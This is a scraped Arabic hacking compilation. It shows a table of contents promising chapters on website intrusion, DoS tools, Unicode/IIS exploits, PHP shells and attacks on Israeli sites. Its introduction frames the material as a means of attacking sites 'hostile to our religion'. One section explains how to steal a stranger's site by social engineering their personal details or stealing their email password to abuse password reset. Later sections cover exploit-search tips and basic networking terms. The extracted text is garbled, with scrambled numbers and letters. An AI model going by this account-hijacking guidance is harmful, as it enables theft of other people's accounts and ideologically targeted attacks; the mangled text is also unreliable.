اروع كتاب عن الهكر 400 صفحة عربي

Document Sample
اروع كتاب عن الهكر 400 صفحة عربي Powered By Docstoc
					1
‫المحتويات‬
                                                       ‫1. المقدمة.‬
                                                      ‫2. الفهرس.‬
                                       ‫3. مقدمة عامة عن الهاكر.‬
                                     ‫4. كيفية البحث في اإلنترنت.‬
              ‫5. مفاهيم خاصة بشبكات اإلنترنت (الجزء األول).‬
             ‫6. مفاهيم خاصة بشبكات اإلنترنت (الجزء الثاني).‬
                                           ‫7. األمن عبر اإلنترنت.‬
                                                 ‫8. أمن الشبكات.‬
             ‫9. مصطلحات مهمة للمبتدئين في اختراق المواقع.‬
                                    ‫11. اختراق المواقع للمبتدئين.‬
                             ‫11. اإلختراق ببرنامج ‪.Webcrack‬‬
                         ‫21. اإلختراق ببرنامج ‪.MungaBunga‬‬
                         ‫31. برنامج تدمير المواقع ‪.WinSmurf‬‬
                   ‫41. شرح برنامج ‪ Evil Ping‬لتدمير المواقع.‬
                                 ‫51. برنامج الدرة لتدمير المواقع.‬
                                  ‫61. تدمير المواقع بدون برامج.‬
                                                         ‫71. التلنت.‬
                                          ‫81. معلومات عن ‪.DNS‬‬
               ‫91. معلومات عن ‪.Routing in the Internet‬‬
                                                ‫12. ‪.NETBIOS‬‬
                                   ‫12. بروتوكول خدمة ‪.Finger‬‬
           ‫22. ‪ Net‬شرح مختصر إلدارة الشبكة بإستخدام االمر.‬
                                     ‫32. شرح الـ ‪.secure shell‬‬
                        ‫42. شرح معنى الـ‪.Buffer Overflows‬‬
                                ‫52. الـ ‪ CGI‬وعالقتها باإلنترنت.‬
                           ‫62. كيف تحمي نفسك وتخفي أفعالك؟!.‬
         ‫72. كيف تبقى مجهول الهوية في النت (الجزء األول)؟؟.‬
        ‫82. كيف تبقى مجهول الهوية في النت (الجزء الثاني)؟؟.‬
‫92. برنامج ‪ HTTP Port‬الذي يجعلك تتصفح النت متخفيا!!ً.‬
                                 ‫13. شرح برنامج ‪.NeoTrace‬‬
            ‫13. كيفية القيام بجمع المعلومات عن موقع أو شبكة.‬
                     ‫23. برنامج عمران سكان للبحث عن الثغرات.‬
                ‫33. اإلختراق عن طريق اليونيكود (الجزء األول).‬
               ‫43. اإلختراق عن طريق اليونيكود (الجزء الثاني).‬
    ‫53. معلومات عامة عن كيفية االستفادة من ثغرات اليونيكود.‬
                           ‫63. الدليل الكامل إلختراق سيرفر ‪.IIS‬‬
                    ‫73. دراسة مفصلة وبعمق في الـ ‪.UniCode‬‬
             ‫83. تدريب على عملية اإلختراق بواسطة اليونيكود.‬
                ‫93. شرح مفصل لكيفية اختراق المواقع المجانية.‬
                                     ‫14. درس مفصل عن الكوكيز.‬
   ‫14. شرح برنامج األسطورة ‪ God Will‬في تلغيم الصفحات.‬
      ‫24. وداعا ً للبرنامج األسطورة ومرحبا ببرنامج 4‪.NOOP‬‬
        ‫34. معلومات مهمة عن المواقع التي تدعم الفرونت بيج.‬
                      ‫44. اختراق المواقع التي تدعم الفرونت بيج.‬
                                           ‫54. اإلختراق العشوائي.‬
              ‫64. الطريقة الصحيحة والمثلى في اختراق المواقع.‬


             ‫2‬
                             ‫74. نبذه يسيرة ومبسطة عن كيفية اختراق المواقع.‬
                                 ‫84. (<س&ج>) في اختراق المواقع للمبتدئين.‬
                                   ‫94. برنامج ‪ CgiScaner‬للبحث عن الثغرات.‬
             ‫15. شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في المواقع.‬
                 ‫15. شرح برنامج ‪ Shadow Scan Security‬لتحليل الموقع.‬
                              ‫25. اماكن وجود ملف الباسورد في أنظمة التشغيل.‬
                                                ‫35. اختراق الموقع (الجزء األول).‬
                                              ‫45. اختراق المواقع (الجزء الثاني).‬
                                              ‫55. اختراق المواقع (الجزء الثالث).‬
                                         ‫65. درس في اختراق المواقع (متوسط).‬
                                                         ‫75. شرح ملف ‪.htaccess‬‬
                                                       ‫85. نظام نقل الملفات ‪.FTP‬‬
                                                   ‫95. اإلختراق عن طريق ‪.FTP‬‬
                                                              ‫16. اختراق الـ‪.SQL‬‬
                                                    ‫16. درس مفصل عن الـ‪.SQL‬‬
                                    ‫26. درس إلحتراف الهاك في اختراق المواقع.‬
                                          ‫36. استغالل لينكس في اختراق المواقع.‬
                           ‫46. درس اخر في اختراق المواقع عن طريق لينكس.‬
‫56. شرح مفصل من األلف إلى الياء في احتراف اختراق المواقع عن طريق لينكس.‬
                                   ‫66. درس عن الـ‪( PHP Shell‬الجزء األول).‬
                                  ‫76. درس عن الـ‪( PHP Shell‬الجزء الثاني).‬
                                  ‫86. درس عن الـ‪( PHP Shell‬الجزء الثالث).‬
                                                           ‫96. شرح أداة ‪.anmap‬‬
                                      ‫17. طريقة إلقتحام السيرفرات بدون ثغرات.‬
                                                  ‫17. ‪.Cross Site Scripting‬‬
                                                        ‫27. كود تدمير سجل الزوار.‬
                                                     ‫37. وضع فايروس في صفحة.‬
                                                                      ‫47. الثغرااات.‬
                                               ‫57. شرح شبه مفصل عن الثغرات.‬
                                                          ‫67. كيف تستخدم الثغرات.‬
                           ‫77. تمتع بإختراق المواقع اإلسرائيلية مع هذه الثغرة.‬
                                                                     ‫87. ثغرة نيوك.‬
                                                             ‫97. ثغرة ‪.Chunked‬‬
                                                               ‫18. حماية المنتديات.‬
                              ‫18. اختراق المنتديات من نوع 0,2,2‪.vBulletin‬‬
                   ‫28. درس مفصل عن كيفية اختراق المنتديات وطرق حمايتها.‬
                                        ‫38. ثغرة في منتديات9,2,2 ‪.vBulletin‬‬
                                            ‫48. اختراق منتديات 0.0.2 ‪.phpbb‬‬
                                                         ‫58. ثغرة في ‪.php nuke‬‬
                                     ‫68. أفضل المنتديات والمواقع العربية للهاك.‬
                                        ‫78. أفضل مواقع األمن والهاك اإلنجليزية.‬
                                                                       ‫88. الخاتمة.‬




                                ‫3‬
                      ‫بسم هللا الرحمن الرحيم‬

‫الحمد هلل رب العالمين الرحمن الرحيم والصالة والسالم على أشرف األنبياء‬
                 ‫والمرسلين نبينا محمد عليه أفضل الصالة وأتم التسليم،‬
                                                            ‫أما بعد...‬

     ‫ارجوا من العلي القدير أن يوفقني في كتابة هذا الكتاب الذي سيكون‬

 ‫مرجعاً إلخواني وأخواتي المسلمين، ففي هذا الكتاب سأقوم بنقل كل ما‬

      ‫كتب في اختراق المواقع وتدميرها عن أخواني المسلمين من كيفية‬

              ‫اإلختراق بالبرامج وبغيرها للمواقع المعادية لديننا الحنيف،،،‬

                ‫وارجوا من القراء الدعاء في ظهر الغيب لجامع هذا الكتاب.‬


  ‫مالحظة: مواضيع هذا الكتاب ليس من تأليفي إنما هي نقال ً عن اخواني‬

                                                              ‫المسلمين.‬

‫اقرأ هذا اوال ً قبل البدء بقراءة مواضيع هذا الكتاب"اقسم باهلل العلي العظيم‬

    ‫الذي رفع السماء بال عمد أال اقوم بتطبيق ما في هذا الكتاب من طرق‬

              ‫على مواقع اخواني المسلمين وأن انفعهم قدر ما استطيع"‬

                                                           ‫وهللا الموفق،،،‬




                                    ‫4‬
                                    ‫"من هم الهاكر "‬

 ‫الهكرز هم اشخاص مخترقون ألجهزة الغير بمساعدة احدى برامج االختراق المشهورة إعتماد على برامج‬
           ‫ً‬
                               ‫مساندة تسهل عملية االتصال بين الحاسبين تسمى بالباتش اوالسيرفر.‬

                                                                   ‫-كيف يتم اختراق مواقع اإلنترنت؟؟‬

                                            ‫هذا السؤال الذي دفع الكثيرين الي البحث واالبحار في عالم النت‬
                                             ‫هناك انواع من الصفحات والسرفرات التي توفر مواقع مجانية‬
                                                                                              ‫النوع االول‬

 ‫سيرفرات تحتفظ ببياناتك واذا نسيت او لم تتذكر باسوورد موقعك فانها سوف تطلب منك بياناتك الشخصية‬
                                                               ‫السرية التي ال يعلمها اال انت مثل‬
                                                                           ‫اسمك الحقيقي الكامل‬
                                                                                  ‫عمرك وميالدك‬
                                                                                  ‫من اي بلد انت‬
                                                         ‫وتختلف الدقة من سيرفر الي سيرفر آخر‬
                                                                                     ‫النوع الثاني‬

  ‫سيرفرات تحتفظ ببياناتك واذا اضعت الباسوورد او نسيته فانها تطلب منك فقط الضغط علي ايكون مكتوب‬
                                                                                                        ‫عليه‬
                                                                                     ‫((نسيت الباسوورد))‬
                                                   ‫ومن ثم يرسلون الباسوورد الي االيميل الخاص بك‬
                                          ‫...................................................................‬
 ‫هذا النوع يسهل اختراقه اذا عرفت بيانات الشخص واستطعت التحدث معه بشتي الطرق وباسلوب لبق وما‬
                                                                                           ‫ان تعرف بياناته‬
     ‫الشخصية حتي يمكنك ان تذهب الي صفحته الخاصه والضغط علي ايكون انك نسيت الباسوورد وادخال‬
                                                                                          ‫البايانات الخاصة‬
                                                                             ‫ومن ثم تغيير الباسوورد ...‬
                                                       ‫وتغيير بيانات صاحب الصفحة الخاصة والسرية‬
                                                                                   ‫..........................‬

                                                                                                ‫النوع الثاني‬

  ‫هذا النوع مهما حاولت سرقة الباسوورد فانك التستطيع ان تمتلك الصفحة لمدة طويلة الن الشركة سوف‬
                                                                                 ‫ترسل اليه الباسوورد‬
                                                 ‫الجديد .. ومن هنا سيعرف الباسوورد ورقمه الجديد ..‬
                                             ‫وسيتم اعادة ملكيته الي الصفحة او الموقع مره أخري !!!‬
                                                                                   ‫اذا كيف الحل ؟؟ ((‬
                                                                                          ‫الحل هو ..‬
‫ان تعرف باسوورد االيميل الخاص به وحين تعرف الباسوورد سيمكنك الذهاب الي الشركة وكتابة انك نسيت‬
                                                                                    ‫الباسوورد للموقع‬
                                       ‫فسيتم اخطارك علي االيميل الذي سرقته .. بالباسوورد للموقع ..‬
                                                            ‫ومن هنا يمكنك سرقتة وملكيته وانت بسالم.‬

                                                 ‫انتهى،،،‬




                                                    ‫5‬
                           ‫"كيفية البحث في اإلنترنت"‬



                                                               ‫<منقول من منتديات شبكة الحزم اإلسالمية>‬

                                                                                    ‫<الكاتب: بالك هنتر >‬

                                                                           ‫كيفية البحث في االنترنت ؟‬
   ‫عندما نسمع عن برنامج ما او عن مشكلة ما او اي شيء في االنترنت ونريد البحث عنها كيف يتم ذلك ؟؟‬
‫غالبا نجد ان الشباب ال يقدر ان يقوم بالبحث في منتدى فما بالك بمسئله تريد البحث عنها في االنترنت ؟ وقد‬
                                                ‫تجده يبحث ولكن ال يحصل بنتيجه والخطأ ليس في البحث‬
                                                                                  ‫بل في طريقة البحث‬


     ‫صنعت محركات البحث حتى تساعدك في الوصول الى ما تريد باقصر وقت ممكن ولكن عليك ان تعلم ان‬
                                               ‫محركات البحث لكل منها عمل مع العلم انها عامه ولكن‬
                                                                                  ‫ما هي النتائج ؟؟‬

  ‫بالنسبه مثال للجوجل انا اعتبره المحرك الذكي فهو يعرف ماذا كتبت فلذلك يعطيك النتائج االولى وهي غالبا‬
                                                                                               ‫التي تريدها‬
   ‫بالنسبه للياهو هو ايضا ذكي ولكن ذكائه تجاري بحت حيث انه يقدم لك المواقع التجاريه التي تقدم ما تريد‬
                                               ‫والتي يتعامل معها المحرك ثم المواقع التجاريه التي ال يتعامل‬
                                                    ‫معها المحرك ثم المواقع العامه وهي ما ترده انت احيانا‬

                                                                                 ‫اعتقد ان المسئله وضحت‬

   ‫يا اخوان انا ابغى ابحث عن برنامج ما مثال يجب علي ان اخطط للبحث قبل ان اذهب الى المنتديات واسئل‬
                                                                                ‫الزم انت تتعلم كيف تبحث‬
‫وش الفرق بينك وبين االنسان اللي هيجيبلك المعلومه من المنتدى ؟ هل يملك ريشه على دماغه ؟؟؟ ال اعتقد‬
                                                                                                     ‫ذلك‬
   ‫هل االنترنت لديه سريعه للغايه وانت بطئيه للغايه ؟ ايضا ال اعتقد ذلك مع العلم ان السرعات العاليه اثبتت‬
                                                                          ‫فشلها بالنسبه لبعض االشخاص‬
                                                                        ‫التي ال تعرف كيف توظف عقولها‬

 ‫كنت مره في حديث مع صديق لي بدوله عربيه في الخليج وكان يحدثني بصراحه ويقول لي وهللا يا اخ بالك‬
                                                                 ‫انا االن لي سنه كامله على االنترنت‬
          ‫غير محدد بباندويث وبسرعة 256 وال اعرف من برامج االختراق غير الهاك اتاك‪ISDN‬مع خط‬

‫فعال انا تحطمت سنه كامله ومعك القوه الضاربه هذه وال تعرف غير الهاك اتاك ؟ قلتلله انت اكيد وقتك ما بين‬
                                       ‫مواقع االغاني واالفالم والداون لود لها والشات قال ايوهللا هذا هو انا‬
                                                                ‫وبذلك فعال ايقنت ان السرعه ليست كل شيء‬

                    ‫اهم شي عقلية من يملك السرعه فالسال ح الذي ال تستطيع استخدامه - ال ينفع :) - ا هـ.‬

                                                                 ‫االن سنقوم بشر ح كيفية التخطيط للبحث :‬




                                                    ‫6‬
                                                            ‫طريقه بسيطه جدا وهي عبر تقسيم المواقع‬

                                                                                         ‫مواقع تجاريه‬
                                                                  ‫مواقع برامج (( ويندوز - ليونكس ))‬
                                                                                       ‫مواقع ملتيميديا‬
                                                                               ‫مواقع سياسيه واخباريه‬
                                                                                            ‫مواقع هاك‬
                                                                                           ‫مواقع كراك‬
                                                                                      ‫مواقع سكيوريتي‬
                                                                                       ‫مواقع هاردوير‬
                                                                                               ‫منتديات‬
                                                               ‫محرك بحث جوجل (( هذا لوحده عالم ))‬
                                                                                       ‫مواقع ..... الخ‬

                                                                               ‫االن لنأخذ ما نبحث عنه‬

‫مثال برنامج ؟ بسيطه جدا ؟ وش يخليني ارو ح ابحث مثال في الياهو ؟؟؟ وش يخليني ابحث بمحرك عام ؟؟؟؟‬
                                                          ‫او حتى وش يخليني ارو ح ابحث بالقوقل ؟؟؟‬
    ‫خالص بما انه برنامج انطلق فورا الى مواقع البرامج امثال زد دي نت - ويب اتاك - داون لود - وغيرها‬
               ‫وبالنسبه لليونكس فهناك موقع انا اعتبره انه اقوى من موقع داون لود في برامجه للويندوز‬
                               ‫وهو موقع فريش ميت (( اخر الموضوع ساضع كل تلك المواقع كمرجع ))‬

 ‫بعد ان بحثت ولم اجد البرنامج ماذا افعل ؟ هل انتهى العمل ؟ ال لم ينتهي بعد اذهب الى الجوجل وابحث عن‬
                                    ‫ما تريد وابدا بقرائه النوتس الذي يخبرك ماذا تحوي هذه الصفحه‬
                                                                       ‫واذا وجدت ما تريد ادخل اليها‬

‫لم تجد ؟؟ (( ما اعتقد انك ما هتالقي اللي تدور عليه انا عمري ما سويت هالطريقه اال واجد ما اريد )) ولكن‬
                                          ‫لنفرض انك لم تجد ؟ ماذا ستفعل ؟ اذهب الى المنتديات وابحث‬
                                                ‫قبل ان تسأل واذالم تجد وقتها بامكانك السوال بالمنتدى‬

                                  ‫هذه نقطه نقطة اخرى مثال انت منت عارف اللي انت تبحث عنه بالظبط‬

                              ‫مثال انا ادور على ثغره عارف نوعها ولكن ماني عارف موجوده في وش‬
                     ‫‪ CSS‬او ‪ XSS‬واللي اختصارها ‪Cross Site Scripte‬ولتكن مثال ثغرات الـ‬
                                       ‫انا ما ادور على الثغره ادور على اكسبلويت مثال وش اسوي ؟؟؟‬
 ‫هيطلعللك كل شي عنها ابدا ابحث فيما تريد وفي نفس ‪XSS‬اذهب اوال لمواقع السكيوريتي ابحث عن كلمة‬
                                                           ‫الوقت اذهب الى الجوجل مثال وابحث عن‬
     ‫ولكن هذا ال يكفي انا ابغى شي بعينه والجوجل مو زي مواقع السكيوريتي هتجيب شي بسيط ال ‪XSS‬‬
                                     ‫الجوجل هيجيب بالوي ولذلك علي بتحديد البحث عبر عالمه ( + )‬

                                  ‫يعني انا ادور بجز وادور اكسبلويت وادور باسم الثغره فعلي ان اكتب :‬
                                                                       ‫‪XSS+BUG+EXPLOIT‬‬
                                                                        ‫هاكتب :‪IIS‬مثال ادور ثغرات‬
                                                                             ‫‪IIS+exploit+bug‬‬

          ‫خليه يطلعللك كل شي عن المسئله اللي تبحث عنها اهم شي انه يجيبلك مواضيع في ما تبحث عنه‬

                                                 ‫ومن ثم المنتديات ومن ثم الكتابه عن ما تريد اذا لم تجد‬

                                                                       ‫اهم شي بالنقطه التخطيط للبحث‬


                                                 ‫7‬
             ‫عن ماذا ابحث ؟ موضوع يتعلق ببرنامج ؟ ويندوز واال ليونكس ؟ رتب المواقع : ابدا البحث‬
                                ‫عن ماذا ابحث ؟ موضوع يتعلق بالشوبرينج ؟ رتب المواقع : ابدا البحث‬
                                                                                            ‫وهكذا‬

                                                       ‫االن ساضع لكم مجموعه من المواقع تفيدكم جدا‬

                                                      : ‫الملك جوجل‬http://www.google.com/

: ‫محركات بحث عاديه ومتقدمه‬http://www.yahoo.com - /http://www.altavista.com /
                            -http://www.lycos.com - /http://hotbot.lycos.com/

)) ‫مواقع ملتيميديا : (( عبر برامجها مثثل الكازا او المورفيس او اوديو جاالكسي او وين ام اس‬kazaa -
                                                                             WinMX‫االكثر شهره‬

                     : ‫مواقع سياسيه واخباريه‬http://news.bbc.co.uk/hi/arabic/news -
                               http://arabic.cnn.com/ - http://www.aljazeera.net/

                                ‫ : مواقع سكيوريتي‬http://www.securiteam.com/ -
               http://www.securityfocus.com/ - http://www.ussrback.com/ -
                    http://www.ntbugtraq.com/ - http://www.ntsecurity.nu/ -
                                                   http://www.ntsecurity.com/

‫ : مواقع هاردوير‬http://nvidia.com/ - http://www.asus.com/ - http://drivers.on-
                     line.net.nz/ - http://intel.com/ - http://www.amdmb.com/


                                           ،،،‫انتهى‬




                                              8
        ‫"مفاهيم خاصة بشبكات األنترنت (الجزء األول)"‬

                                                                                            ‫<منقول>‬

                                                                            ‫<الكاتب: عصام الوقيت >‬

    ‫اإلنترنت عالم مليء بالفائدة، مليء بالمتعة، عالم يجد فيه كل إنسان ما يهمه، باختالف مجاالت االهتمام‬
  ‫واختالف األشخاص. ولكن على الرغم من كثرة األشياء المفيدة في اإلنترنت إال أنه البد من وجود ما يكدر‬
                        ‫الصفو. هذا الكدر نسميه "الهاكرز" أو من يسمون بالمخترقين في بعض األحيان.‬
 ‫من هم الهاكرز ؟ وما هي أهدافهم ؟ وكيف نتقي شرهم ؟ أسئلة ال بد أنها دارت في رأس أكثر المستخدمين‬
  ‫في مختلف أنحاء العالم، وال سيما أولئك المستخدمين الذين طالهم أذى الهاكرز سواء بسرقة معلومات من‬
                                    ‫أجهزتهم أو إتالف محتوياتها أو في أهون األحوال إخافتهم وإرعابهم.‬
    ‫الهاكر الطيب سلسلة من الحلقات نقدمها لك أخي القارئ، كوسيلة تعليمية لكل المستخدمين على مختلف‬
‫مستوياتهم لكي يتعلموا كيف يتقون شرور هؤالء الهاكرز ولكي يعرفوا الحيل التي يستخدمها الهاكرز إللحاق‬
   ‫األذى بهم. باختصار ستكون أخي القارئ أحد هؤالء الهاكرز، ولكن لن تكون مثلهم في الشر..بل ستكون‬
                                                                                        ‫الهاكر الطيب.‬

                                                                                      ‫مقدمة:‬
 ‫هذه الحلقة ستكون مخصصة لتقديم بعض المهارات والمعلومات األساسية التي يجب أن يعرفها كل من يريد‬
                     ‫اتقاء شر الهاكرز، وهي بعض المصطلحات والمفاهيم الخاصة شبكات الحاسب اآللي.‬

                                                                                               ‫رقم ‪IP‬‬
‫ما الغرض من بطاقة األحوال المدنية التي تحملها ؟ انها مجرد وسيلة لتمييزك وتعريفك. فالرقم الموجود على‬
                                                  ‫بطاقتك يستحيل تكراره ألي مواطن آخر في نفس البلد.‬
‫نفس المبدأ ينطبق في مجال الحاسب اآللي من ناحية الشبكات، فلتمييز األجهزة المرتبطة بشبكة واحدة يعطى‬
  ‫لكل جهاز رقم مميز يستحيل تكراره في أي جهاز آخر مرتبط بنفس الشبكة وهذا الرقم هو ما يسمى بعنوان‬
                                                                                        ‫الجهاز أو ‪.IP‬‬
   ‫في حالة الشبكات الدائمة والتي يكون الجهاز مرتبطا بالشبكة بواسطة أسالك الشبكة، يكون هذا الرقم ثابتا‬
 ‫للجهاز دائما. مالم يتم نزع الجهاز من الشبكة بشكل دائم، ولكن في حالة االتصال الهاتفي فإن عنوان الجهاز‬
                                        ‫يتغير كلما اتصلت على موفر الخدمة الذي تدخل للشبكة من خالله.‬
   ‫لعلك اآلن تتساءل كيف أعرف عنوان جهازي عندما أتصل باالنترنت؟ األمر سهل جدا من شريط المهام في‬
‫الوندوز انقر على ‪ Start‬ثم ‪ run‬ثم أدخل ‪ .winipcfg‬إذا كنت تستخدم وندوز باعتماد اللغة العربية اختر‬
                                                              ‫"ابدأ" ثم "تشغيل" ثم اكتب ‪.winipcfg‬‬

                                                                                   ‫توزيع أرقام الـ ‪IP‬‬
   ‫هل سبق وأن تساءلت لماذا كان رقم ‪ IP‬الخاص بك هو 2.2..33.626 وليس 3.22.5..6، وهل سبق‬
‫وأنت تساءلت لماذا تبدأ ارقام الـ‪ IP‬في السعودية بالرقم 626 وليس بأي رقم آخر ؟ في الحقيقة إن أرقام ‪IP‬‬
   ‫اليتم توزيعها بطريقة عشوائية أو بطريقة "كل ٌ يأخذ ما يريد" بل بالعكس يوجد هناك منظمات تشرف على‬
‫توزيع أرقام ‪ IP‬على الدول والمؤسسات داخل الدول بحيث يتم معرفة الجهة عند معرفة رقم ‪ IP‬الذي تمتلكه.‬
 ‫تشرف منظمة )‪IANA(Internet Assigned Numbers Authority‬على توزيع أرقام ‪ IP‬على‬
     ‫مستوى العالم، حيث أنها تقوم باإلشراف على ثالث منظمات فرعية وتكون كل منظمة مسؤولة عن جزء‬
                                                           ‫معين من العالم وهذه المنظمات الفرعية هي:‬
       ‫-1منظمة )‪ ARIN (American Registry for Internet Numbers‬وتشرف على أمريكا‬
                                              ‫الشمالية والجنوبية والمناطق الكاريبية وأجزاء من افريقيا‬
‫6- منظمة ‪ )RIPE (Réseaux IP Européens‬وتشرف على منطقة أوروبا والشرق األوسط وأجزاء‬
                                                                                           ‫من افريقيا‬
      ‫3- منظمة ‪ )APNIC (Asia Pasific Network Information Center‬وتشرف على آسيا‬



                                                 ‫9‬
 ‫تقوم كل منظمة باإلشراف على توزيع ارقام ‪ IP‬للدول الواقعة تحت مجال اشرافها. ويوجد لكل منظمة قاعدة‬
‫بيانات تمكنك من معرفة صاحب رقم ‪ IP‬معين وتسمى هذه الخدمة بخدمة ‪ whois‬حيث تقوم بإدخال رقم ‪IP‬‬
  ‫التابع لمنظمة معينة وستحصل على معلومات عن من يمتلك هذا ‪ IP‬فمثال لمعرفة صاحب رقم ‪ IP‬معين في‬
  ‫المملكة العربية السعودية قم بالذهاب للموقع ‪ http://www.ripe.net/db/whois.html‬وأدخل رقم‬
                                           ‫‪ IP‬وستحصل على معلومات متكاملة عن صاحب هذا الرقم.‬

                                                                                       ‫عائلة الـ‪IP‬‬
 ‫من المعروف أن رقم الـ‪ IP‬يتكون من أربعة أقسام كالتالي 2.22.22.22 كل قسم من هذه األقسام يمكن أن‬
   ‫تكون له قيمة تتراو ح بين 2 و 556 (مع وجود بعض االستثناءات التي ليس هذا المجال لذكرها) الشيء‬
  ‫الذي يجب معرفته أن أول ثالثة أقسام من الجهة اليسرى من رقم ‪ IP‬غالبا ما تكون محجوزة لمزود خدمة‬
  ‫معين بحيث تكون جميع أرقام ال‪ IP‬التي يتشابه بها أول ثالثة أقسام من الجهة اليسرى تنتمي لنفس مزود‬
                  ‫الخدمة. فمثال الجهاز الذي يحمل رقم 43.57.62.212 ‪ IP‬والجهاز الذي يحمل رقم ‪IP‬‬
                                             ‫102.57.62.212 غالبا ما ينتميان لنفس مزود الخدمة.‬
 ‫ولمعرفة مزود الخدمة بواسطة رقم ‪ IP‬الثالثي (أي رقم ‪ IP‬بدون آخر رقم من الجهة اليمنى ) يمكنك زيارة‬
     ‫موقع المنظمة المشرفة على البلد الذي ينتمي له رقم ‪ IP‬واستخدام خدمة ‪ whois‬الخاصة بها. فمثال،‬
 ‫لمعرفة مزود الخدمة في المثال أعاله قم بالذهاب للموقع ‪http://www.ripe.net/db/whois.html‬‬
   ‫وأدخل الرقم 51.26.626 في المربع الموجود في الصفحة ومن ثم انقر الزر ‪ search‬وستحصل على‬
                                                         ‫جميع المعلومات المخزنة عن مزود الخدمة.‬




                                                                                            ‫المنفذ‪Port‬‬
‫ماهو المنفذ ؟ تخيل منزال فيه العديد من األبواب وأن كل واحد من هذه األبواب مخصص لخدمة معينة ، فباب‬
‫الستقبال الضيوف وباب آخر للخدم وباب آخر لدخول الخدمات.نفس المبدأ ينطبق على الحاسب اآللي فالجهاز‬
    ‫يحتوي على العديد من الخدمات مثل خادم الويب ‪ web server‬وخادم الملفات ‪ ftp server‬وغيرها.‬
 ‫فكل تطبيق لديه منفذ معين يستخدمه الرسال واستقبال بياناته وهذا نوع من التنظيم فمثال خدمة الويب غالبا‬
     ‫ما تكون على المنفذ 20 وخدمة الملفات تكون على المنفذ 26 وبرنامج النت ميتنغ يكون على عدة منافذ‬
      ‫منها 2612 وكل تطبيق يكون له منفذ معين. فبالتالي عندما تأتي بيانات للجهاز على منفذ معين فسوف‬
             ‫يعرف الجهاز ألي تطبيق تنتمي هذه البيانات ويقوم بإرسالها لهذا التطبيق الذي يقوم بمعالجتها.‬

                                                                                        ‫‪ DNS‬ماهو ؟‬


                                                 ‫01‬
       ‫أنت بالطبع تتذكر أسماء أصدقائك وال تواجه أي مشكلة في استرجاعها من ذاكرتك ولكن ماذا عن أرقام‬
‫هواتفهم ؟كم رقما تحفظ منها ؟ اثنان ؟ عشرة؟ مهما كانت ذاكرتك جيدة فلن تستطيع حفظ أرقام هواتفهم كلها‬
         ‫وإن فعلت فتبقى الحقيقة أن نسيان األرقام أكثر سهولة من نسيان األسماء. من هذا المبدأ جاءت فكرة‬
‫‪ .DNS‬حيث أنه في بداية استخدام االنترنت كان من المفروض أن تحفظ عنوان الجهاز‪ IP‬لكل موقع .. فمثال‬
   ‫لزيارة موقع ‪ CNN‬يجب أن تكتب 22.35.5.2.126 بدال من ‪ www.cnn.com‬ومن ثم الحظ خبراء‬
     ‫الحاسب أن ذلك سيكون صعبا جدا .. فالذاكرة البشرية غير قادرة على حفظ الكثير من األرقام ومن هنا تم‬
        ‫التوجه للـ ‪ DNS‬وهو عبارة عن جهاز خادم يحفظ معلومات هي عبارة عن أسماء األجهزة وأرقام ‪IP‬‬
        ‫الخاصة بها حيث يقوم المستخدمون بإرسال اسم الموقع الى مزود ‪ DNS‬ليرد عليهم بعنوانه (رقم ‪IP‬‬
    ‫الخاص به) فلتدخل على موقع ‪ www.cnn.com‬يكفي ان تكتبها في المستعرض الذي سيقوم بإرسالها‬
       ‫لخادم االسماء ‪ DNS‬والذي سيقوم بتحويلها الى عنوان الجهازحتى يستطيع جهازك التخاطب مع خادم‬
     ‫الويب الخاص بشبكة سي ان ان... اختصارا، يمكن القول بأن خادم األسماء ‪ DNS‬ماهو اال جهاز يحتوي‬
                                  ‫على قاعدة بيانات فيها اسماء االجهزة في االنترنت وأرقام ‪ IP‬الخاصة بها.‬

                                                                                      ‫األمر ‪netstat‬‬
     ‫هل تعلم بأنه من المستحيل أن يكون هناك تخاطب بين جهازك وبين أي جهاز آخر في اإلنترنت بدون أن‬
‫يكون لدى كل من الجهازين رقم الـ‪ IP‬الخاص بالجهاز اآلخر؟ وأقصد بالتخاطب هو نقل أي نوع من البيانات.‬
   ‫هذا شيء ضروري فلكي ترسل رسالة إلى شخص معين فيجب أن تعرف عنوانه ويجب هو أيضا أن يعرف‬
‫عنوانك لكي يقوم بالرد عليك. بالطبع هناك عدة استثناءات سنتحدث عنها في وقتها. في نظام الشبكات يسمى‬
       ‫هذا التخاطب باالتصال ‪ .connection‬طبعا لكل اتصال يجب أن يكون هناك من يقوم بطلب االتصال‬
                 ‫ويسمى عميل أو ‪ Client‬ويكون هناك أيضا من يتم االتصال عليه ويسمى مزود ‪.server‬‬
  ‫هناك أمر في نظام الدوس يسمح لك بمعرفة جميع األجهزة المتصلة بجهازك ( أو التي يقوم جهازك بارسال‬
 ‫واستقبال البيانات منها) ومعرفة المتفذ (‪ )port‬الذي تم عليه االتصال( فائدة المنفذ هي تحديد التطبيق الذي‬
   ‫تم االتصال عليه) وهذا األمر هو األمر ‪ netstat‬ما عليك إال أن تقوم بتشغيل ‪ ms-dos prompt‬من‬
‫قائمة برامج ‪ programs‬ومن ثم اكتب هذا األمر وستحصل على قائمة بكل هذه األجهزة مع المنفذ الذي تم‬
                                                                        ‫عليه االتصال في كال الجهازين.‬

                                                           ‫المحادثة (‪IRC) Internet Relay Chat‬‬
‫طريقة عمل نظام المحادثة هي وجود مزود محادثة ‪ chat server‬ووجود برنامج محادثة ‪chat client‬‬
      ‫في كل جهاز بحيث إذا أراد شخص الدخول للمحادثة يقوم بتشغيل برنامج المحادثة ، والذي بدوره يقوم‬
     ‫باالتصال بمزود المحادثة. وبعد إجراء االتصال يتمكن الشخص من الدخول ألي من الغرف الموجودة في‬
   ‫المزود كما يمكنه أيضا انشاء الغرف الخاصة به، كما يمكنه أيضا القيام بالعديد من الوظائف التي ليس هذا‬
                                                                                         ‫المجال لذكرها.‬
  ‫قلنا في السابق أن كل جهاز يقوم جهازك بالتخاطب معه يعرف رقم الـ‪ IP‬الخاص بك، ولكن يجب أن ال يفهم‬
        ‫هذا الكالم بالشكل الخاطيء فمثال في نظام المحادثة ‪ IRC‬تقوم أنت باالتصال بمزود المحادثة ‪chat‬‬
       ‫‪ server‬وكذلك الحال بالنسبة لجميع المستخدمين، بحيث يكون هذا المزود كالوسيط بينك وبين جميع‬
 ‫األشخاص المتصلين به، فلكي تقوم بإرسال رسالة لشخص ما، يقوم برنامج المحادثة بإرسال الرسالة لمزود‬
‫المحادثة والذي بدوره يقوم بإرسالها للشخص وبالتالي فإنه ال يوجد اتصال مباشر بينك وبين أي شخص آخر‬
       ‫خالل نظام المحادثة، ولها تالحظ أن برامج المحادثة غالبا ما تعطيك رقم ‪ IP‬لألشخاص اآلخرين ناقصا‬
